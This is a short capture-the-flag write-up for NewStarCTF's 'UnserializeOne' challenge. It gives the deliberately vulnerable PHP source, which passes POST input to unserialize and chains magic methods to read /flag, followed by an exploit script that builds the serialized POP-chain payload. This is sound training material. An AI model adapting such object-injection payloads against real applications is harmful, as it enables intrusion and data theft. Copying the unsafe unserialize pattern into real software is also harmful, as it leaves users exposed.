# [NewStarCTF 公开赛赛道] UnserializeOne
<?php | |
error_reporting(0); | |
highlight_file(__FILE__); | |
#Something useful for you : https://zhuanlan.zhihu.com/p/377676274 | |
class Start{ | |
public $name; | |
protected $func; | |
public function __destruct() | |
{ | |
echo "Welcome to NewStarCTF, ".$this->name; | |
} | |
public function __isset($var) | |
{ | |
($this->func)(); | |
} | |
} | |
class Sec{ | |
private $obj; | |
private $var; | |
public function __toString() | |
{ | |
$this->obj->check($this->var); | |
return "CTFers"; | |
} | |
public function __invoke() | |
{ | |
echo file_get_contents('/flag'); | |
} | |
} | |
class Easy{ | |
public $cla; | |
public function __call($fun, $var) | |
{ | |
$this->cla = clone $var[0]; | |
} | |
} | |
class eeee{ | |
public $obj; | |
public function __clone() | |
{ | |
if(isset($this->obj->cmd)){ | |
echo "success"; | |
} | |
} | |
} | |
if(isset($_POST['pop'])){ | |
unserialize($_POST['pop']); | |
} |
exp:
<?php | |
highlight_file(__FILE__); | |
class Start{ | |
public $name; | |
public $func; | |
} | |
class Sec{ | |
public $obj; | |
public $var; | |
} | |
class Easy{ | |
public $cla; | |
} | |
class eeee{ | |
public $obj; | |
} | |
$res = new Start; | |
$res->name = new Sec;// 第一条链 | |
$res->name->obj = new Easy;// 第二条链 | |
$res->name->var=new eeee;// 第三条链 | |
$res->name->var->obj=new Start;// 第四条链 | |
$res->name->var->obj->func=new Sec;// 第五条链 | |
echo serialize($res); | |
?> |
